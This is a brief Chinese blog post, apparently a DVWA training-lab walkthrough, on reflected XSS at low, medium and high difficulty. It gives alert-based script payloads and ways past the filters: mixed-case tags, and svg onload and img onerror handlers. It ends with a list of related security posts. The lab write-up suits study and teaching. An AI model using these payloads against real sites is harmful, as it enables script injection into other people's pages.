一、低级low
简单拿捏
<script>alert(123)</script>二、中级middle
源码过滤了script但是没有过滤大小写,改成大写S
<Script>alert(123)</script>三、高级high
比中级高,过滤了script并且以及大小写,使用其他标签,二选一就行
<svg onload=alert(123)>
<img src=x onerror=alert(123)>【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦
假客套2024-11-06 13:19
相关推荐
m0_738120722 分钟前
网路安全编程——熟悉并使用Scapy简单实现捕捉主流邮箱协议(SMTP、POP3和IMAP) 的身份凭证HackTwoHub10 小时前
AI大模型网关存在SQL注入、附 POC 复现、影响版本LiteLLM 1.81.16~1.83.7(CVE-2026-42208)其实防守也摸鱼10 小时前
CTF密码学综合教学指南--第五章HackTwoHub13 小时前
全新 AI 赋能网安平台 基于 Mitmproxy 流量分析自动化资产挖、轻量化综合渗透工具箱HackTwoHub15 小时前
Linux 内核史诗级本地提权 全网深度复现、原理完整分析( CVE-2026-31431)X7x518 小时前
筑牢网络安全防线:Web应用防火墙(WAF)全面解析以太浮标18 小时前
华为eNSP模拟器综合实验之- MGRE多点GRE隧道详解菩提小狗19 小时前
每日安全情报报告 · 2026-05-03love you joyfully20 小时前
如何随时随地访问你的“进程”?勿忘初心122121 小时前
企业级敏感数据脱敏工具类(Java实现)